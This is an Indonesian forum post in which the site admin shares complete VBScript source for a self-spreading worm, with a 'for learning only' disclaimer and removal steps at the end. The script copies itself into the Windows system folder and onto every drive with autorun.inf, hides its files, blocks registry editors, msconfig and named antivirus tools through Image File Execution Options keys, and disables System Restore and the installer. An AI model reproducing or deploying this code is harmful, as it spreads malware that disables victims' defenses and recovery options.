Apakah Kamu Sudah Punya ID,
Dan Mau Langsung Login ?
Jika Belum Segeralah Daftar
Berikan Post Dan Komentar Sebanyak Mungkin....!!!!!!






 
IndeksPortalCalendarGalleryFAQPencarianAnggotaGroupPendaftaranLogin
Login
Username:
Password:
Login otomatis: 
:: Lupa password?
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
My Facebook
Dnis Devonzs

Buat Lencana Anda
Statistics
Total 19 user terdaftar
User terdaftar terakhir adalah umazaki

Total 196 kiriman artikel dari user in 194 subjects
User Yang Sedang Online
Total 2 uses online :: 0 Terdaftar, 0 Tersembunyi dan 2 Tamu

Tidak ada

User online terbanyak adalah 26 pada Mon Jun 18, 2012 3:47 pm

Share | 
 

 Membuat Virus Dengan Visual Basic Script 1

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
admin
Admin
Admin


Jumlah posting : 217
Points : 650
Reputation : 2
Join date : 25.02.11
Age : 23
Lokasi : blitar

PostSubyek: Membuat Virus Dengan Visual Basic Script 1   Wed Mar 02, 2011 6:25 am

Ya..

Kali ini saya akan membagi script virus, script ini boleh anda sebarluaskan, bahkan anda jalankan. Tapi dengan tujuan untuk pembelajaran semata.

Kedewasan sikap anda sangat dibutuhkan, segala resiko yang dihasilkan oleh virus ini, diluar tanggung jawab saya.

Sekali lagi, gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini.

Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next

-------------------------script begin--------------------------

On error resume next

Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd

'Siapkan isi autorun atau bahasa kerennya make the autorun

‘wscript.exe jangan di ubah maka virus dengan ext vbs tidak akan dieksekusi

Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"

Set you = createobject("scripting.filesystemobject")

Set mf = you.getfile(wscript.scriptfullname)

Dim text,size

Size = mf.size

Check = mf.drive.drivetype

Set text = mf.openastextstream(1,-2)

Do while not text.atendofstream

Dini = dini & text.readline

Dini = dini & vbcrlf

Loop

Do

'Buat file induk bahasa coolnya prepare the mother

Set i = you.getspecialfolder(0)

Set jatiya = you.getspecialfolder(1)

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 32

Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf = you.getfile(jatiya & "\hck3d.vbs")

Tf.attributes = 39

'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya

For each loph in you.drives

If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then

Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")

Tf.attributes =32

Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)

Tf.write dini

Tf.close

Set tf=you.getfile(loph.path &"\vhck3d.vbs")

Tf.attributes = 39

Set tf =you.getfile(loph.path &"\autorun.inf")

Tf.attributes = 32

Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)

Tf.write isi

Tf.close

Set tf = you.getfile(loph.path &"\autorun.inf")

Tf.attributes=39

End if

Next

'Manipulasi registry

Set vhck3d = createobject("wscript.shell")

'Banyak yang dirubah..liat ndiri deh aaah

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""

Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"

Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"

If check <> 1 then

Wscript.sleep 200000

End if

Loop while check <> 1

Set sd = createobject("wscript.shell")

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

-----------------------end script-----------------------------

Yaaa....itu adalah scriptnya, tapi kalau kalian mau modifikasi juga boleh..bahkan cukup sampai di

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname

Juga boleh, yg bawahnya gak usah kalian lanjutin bisa..

Cara bunuhnya gampang.

Ikutin aja langkah2 dibawah ini untuk pembasmiannya.kalo virusnya aktif, (kalo belum, diaktifkan laaah) jangan buka my computer seperti biasa.tapi buka melalui explorer, bisa lewat start -> klik kanan di my computer, bisa lewat jendela + e(logo windows yang ada di keyboard). Lalu masuk di setiap drive melalui tree, ini agar virusnya tidak jalan di banyak drive, cuman cukup jalan di satu drive dimana kalian simpan dan mengaktifakn virus tersebut. Soalnya, kalo virusnya sudah aktif, lalu kalian klik 2x tiap2 drive kalian maka virus itu aktif di banyak drive soalnya di setiap drive ada file autorunnya.

Cara pembasmiannya :

1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini [You must be registered and logged in to see this link.] Setelah itu pilih check all, lalu restart explorer

2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada

3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive

4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs

5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah.
Kembali Ke Atas Go down
Lihat profil user http://cybers.my-goo.net
 
Membuat Virus Dengan Visual Basic Script 1
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Cara MenDesign Gear Dengan PhotoShop
» MEMBUAT GAME ASAH OTAK MEMAKAI POWER POINT
» bercanda dengan LOGIKA
» Fitur baru Readmore pada blogspot!
» bikin blog hemat energi!

Permissions in this forum:Anda tidak dapat menjawab topik
 :: Gamescool :: PointBlank-
Navigasi: